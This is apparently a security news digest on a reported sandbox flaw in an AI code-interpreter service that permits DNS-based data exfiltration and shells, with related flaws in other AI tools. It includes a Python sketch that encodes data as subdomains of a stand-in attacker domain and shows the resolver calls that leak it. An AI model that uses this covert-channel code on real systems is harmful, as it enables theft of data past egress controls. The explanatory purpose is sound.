A critical vulnerability has been discovered in Amazon Bedrock, allowing attackers to exfiltrate sensitive data and gain remote code execution (RCE) via DNS queries. The flaw, found in the AgentCore Code Interpreter's sandbox mode, lets malicious actors establish interactive shells inside the sandbox. LangSmith and SGLang are affected by related flaws, highlighting the need for stronger security measures in AI code execution environments. The vulnerability can be exploited because the sandbox permits outbound DNS queries, which an attacker can repurpose as a covert communication channel. The consequences include unauthorized data access and lateral movement within a network. For practitioners, the priority is to promptly assess exposure and apply mitigations; the discovery also underscores the importance of robust security testing and validation for AI systems.
AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE
⚡ High Priority
Why This Matters
In a report published Monday, BeyondTrust revealed that Amazon Bedrock AgentCore Code Interpreter's sandbox mode permits outbound DNS queries that an attacker can exploit to exfiltrate sensitive data and establish an interactive shell, achieving remote code execution inside the sandbox.
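To illustrate the class of technique described above, the sketch below shows how arbitrary data can be smuggled out through DNS lookups alone: the data is base32-encoded and split into DNS labels, each forming a subdomain of an attacker-controlled zone, so every resolution attempt delivers a chunk to the attacker's authoritative nameserver. This is a minimal illustration of the general covert-channel pattern, not BeyondTrust's actual proof of concept; the domain name and function names are hypothetical.

```python
import base64

# Hypothetical attacker-controlled domain; its authoritative nameserver
# logs every query it receives, reassembling the exfiltrated data.
ATTACKER_DOMAIN = "exfil.example.com"

def encode_exfil_queries(data: bytes, max_label: int = 63) -> list[str]:
    """Split data into DNS-safe chunks, each becoming a hostname like
    <chunk>.exfil.example.com. DNS labels are limited to 63 octets, and
    base32 keeps the payload within the hostname character set."""
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    chunks = [encoded[i:i + max_label] for i in range(0, len(encoded), max_label)]
    return [f"{chunk}.{ATTACKER_DOMAIN}" for chunk in chunks]

# Inside a sandbox that blocks general egress but allows DNS, a process
# would trigger the actual queries with an ordinary resolver call, e.g.:
#   import socket
#   for name in encode_exfil_queries(secret_bytes):
#       try:
#           socket.getaddrinfo(name, 80)  # resolver forwards query upstream
#       except OSError:
#           pass  # NXDOMAIN is fine; the query already left the sandbox
```

Because the sandbox's resolver forwards queries upstream regardless of the answer, even a failed lookup leaks the data, which is why permitting outbound DNS effectively defeats the egress controls.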
References
- The Hacker News. (2026, March 17). AI Flaws in Amazon Bedrock, LangSmith, and SGLang Enable Data Exfiltration and RCE. *The Hacker News*. https://thehackernews.com/2026/03/ai-flaws-in-amazon-bedrock-langsmith.html
Original Source
The Hacker News